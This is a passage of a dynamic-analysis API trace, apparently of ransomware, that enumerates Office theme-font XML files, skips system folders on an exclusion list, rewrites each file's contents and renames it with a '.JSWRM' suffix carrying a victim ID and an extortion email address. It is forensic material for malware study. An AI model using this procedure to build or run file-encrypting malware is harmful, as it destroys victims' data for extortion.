16\\Theme Fonts\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x11436ace, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x115da4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x32d6fe35, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName=".", cAlternateFileName="")) returned 0x231dc0 [0100.966] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0100.966] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x11436ace, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x115da4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x32d6fe35, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="..", cAlternateFileName="")) returned 1 [0100.967] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0100.967] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0100.967] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11482f7f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11482f7f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11482f7f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdc9, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Arial Black-Arial.xml", cAlternateFileName="ARIALB~1.XML")) returned 1 [0100.967] lstrcmpiW (lpString1="Arial Black-Arial.xml", lpString2=".") returned 1 [0100.967] lstrcmpiW (lpString1="Arial Black-Arial.xml", lpString2="..") returned 1 [0100.967] lstrcmpiW (lpString1="Arial Black-Arial.xml", lpString2="...") returned 1 [0100.967] lstrcmpiW (lpString1="Arial Black-Arial.xml", lpString2="windows") returned -1 [0100.967] lstrcmpiW (lpString1="Arial Black-Arial.xml", lpString2="recovery") returned -1 [0100.967] lstrcmpiW (lpString1="Arial Black-Arial.xml", lpString2="perflogs") returned -1 [0100.967] lstrcmpiW (lpString1="Arial Black-Arial.xml", lpString2="documents and settings") returned -1 [0100.967] lstrcmpiW (lpString1="Arial Black-Arial.xml", lpString2="$RECYCLE.BIN") returned 1 [0100.967] lstrcmpiW (lpString1="Arial Black-Arial.xml", lpString2="system volume information") returned -1 [0100.967] lstrcmpiW (lpString1="Arial Black-Arial.xml", lpString2="msocache") returned -1 [0100.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Arial Black-Arial.xml", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0100.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Arial Black-Arial.xml", cchWideChar=21, lpMultiByteStr=0x241010, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Arial Black-Arial.xml", lpUsedDefaultChar=0x0) returned 21 [0100.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0100.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Arial Black-Arial.xml", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0100.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Arial Black-Arial.xml", cchWideChar=21, lpMultiByteStr=0x241380, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Arial Black-Arial.xml", lpUsedDefaultChar=0x0) returned 21 [0100.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0100.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0100.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0100.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0100.967] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Arial Black-Arial.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\arial black-arial.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.968] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3529) returned 1 [0100.968] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xdc0) returned 0x206858 [0100.968] ReadFile (in: hFile=0x314, lpBuffer=0x206858, nNumberOfBytesToRead=0xdc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xdc0, lpOverlapped=0x0) returned 1 [0100.971] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.971] WriteFile (in: hFile=0x314, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xdc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xdc0, lpOverlapped=0x0) returned 1 [0100.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0100.971] CloseHandle (hObject=0x314) returned 1 [0100.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0100.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0100.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0100.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0100.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0100.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0100.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0100.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0100.971] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Arial Black-Arial.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\arial black-arial.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Arial Black-Arial.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\arial black-arial.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0100.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0100.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0100.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0100.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0100.972] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11482f7f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11482f7f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11482f7f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xde1, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Arial-Times New Roman.xml", cAlternateFileName="ARIAL-~1.XML")) returned 1 [0100.972] lstrcmpiW (lpString1="Arial-Times New Roman.xml", lpString2=".") returned 1 [0100.972] lstrcmpiW (lpString1="Arial-Times New Roman.xml", lpString2="..") returned 1 [0100.972] lstrcmpiW (lpString1="Arial-Times New Roman.xml", lpString2="...") returned 1 [0100.972] lstrcmpiW (lpString1="Arial-Times New Roman.xml", lpString2="windows") returned -1 [0100.972] lstrcmpiW (lpString1="Arial-Times New Roman.xml", lpString2="recovery") returned -1 [0100.972] lstrcmpiW (lpString1="Arial-Times New Roman.xml", lpString2="perflogs") returned -1 [0100.972] lstrcmpiW (lpString1="Arial-Times New Roman.xml", lpString2="documents and settings") returned -1 [0100.973] lstrcmpiW (lpString1="Arial-Times New Roman.xml", lpString2="$RECYCLE.BIN") returned 1 [0100.973] lstrcmpiW (lpString1="Arial-Times New Roman.xml", lpString2="system volume information") returned -1 [0100.973] lstrcmpiW (lpString1="Arial-Times New Roman.xml", lpString2="msocache") returned -1 [0100.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0100.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Arial-Times New Roman.xml", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0100.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0100.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Arial-Times New Roman.xml", cchWideChar=25, lpMultiByteStr=0x240fc0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Arial-Times New Roman.xml", lpUsedDefaultChar=0x0) returned 25 [0100.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0100.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0100.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Arial-Times New Roman.xml", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0100.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0100.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Arial-Times New Roman.xml", cchWideChar=25, lpMultiByteStr=0x2411c8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Arial-Times New Roman.xml", lpUsedDefaultChar=0x0) returned 25 [0100.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0100.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0100.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0100.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0100.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Arial-Times New Roman.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\arial-times new roman.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.973] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3553) returned 1 [0100.973] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xde0) returned 0x206858 [0100.974] ReadFile (in: hFile=0x314, lpBuffer=0x206858, nNumberOfBytesToRead=0xde0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xde0, lpOverlapped=0x0) returned 1 [0100.977] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.977] WriteFile (in: hFile=0x314, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xde0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xde0, lpOverlapped=0x0) returned 1 [0100.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0100.977] CloseHandle (hObject=0x314) returned 1 [0100.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0100.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0100.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0100.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0100.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0100.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0100.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0100.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0100.978] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Arial-Times New Roman.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\arial-times new roman.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Arial-Times New Roman.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\arial-times new roman.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0100.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0100.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0100.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0100.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0100.978] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11436ace, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11436ace, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11436ace, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdb0, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Arial.xml", cAlternateFileName="")) returned 1 [0100.979] lstrcmpiW (lpString1="Arial.xml", lpString2=".") returned 1 [0100.979] lstrcmpiW (lpString1="Arial.xml", lpString2="..") returned 1 [0100.979] lstrcmpiW (lpString1="Arial.xml", lpString2="...") returned 1 [0100.979] lstrcmpiW (lpString1="Arial.xml", lpString2="windows") returned -1 [0100.979] lstrcmpiW (lpString1="Arial.xml", lpString2="recovery") returned -1 [0100.979] lstrcmpiW (lpString1="Arial.xml", lpString2="perflogs") returned -1 [0100.979] lstrcmpiW (lpString1="Arial.xml", lpString2="documents and settings") returned -1 [0100.979] lstrcmpiW (lpString1="Arial.xml", lpString2="$RECYCLE.BIN") returned 1 [0100.979] lstrcmpiW (lpString1="Arial.xml", lpString2="system volume information") returned -1 [0100.979] lstrcmpiW (lpString1="Arial.xml", lpString2="msocache") returned -1 [0100.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0100.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Arial.xml", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Arial.xml", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Arial.xml", lpUsedDefaultChar=0x0) returned 9 [0100.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0100.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0100.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Arial.xml", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Arial.xml", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Arial.xml", lpUsedDefaultChar=0x0) returned 9 [0100.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0100.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0100.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0100.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0100.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Arial.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\arial.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.980] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3504) returned 1 [0100.980] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xdb0) returned 0x206858 [0100.980] ReadFile (in: hFile=0x314, lpBuffer=0x206858, nNumberOfBytesToRead=0xdb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xdb0, lpOverlapped=0x0) returned 1 [0100.983] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.983] WriteFile (in: hFile=0x314, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xdb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xdb0, lpOverlapped=0x0) returned 1 [0100.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0100.983] CloseHandle (hObject=0x314) returned 1 [0100.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0100.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0100.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0100.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0100.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0100.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0100.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0100.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0100.983] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Arial.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\arial.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Arial.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\arial.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 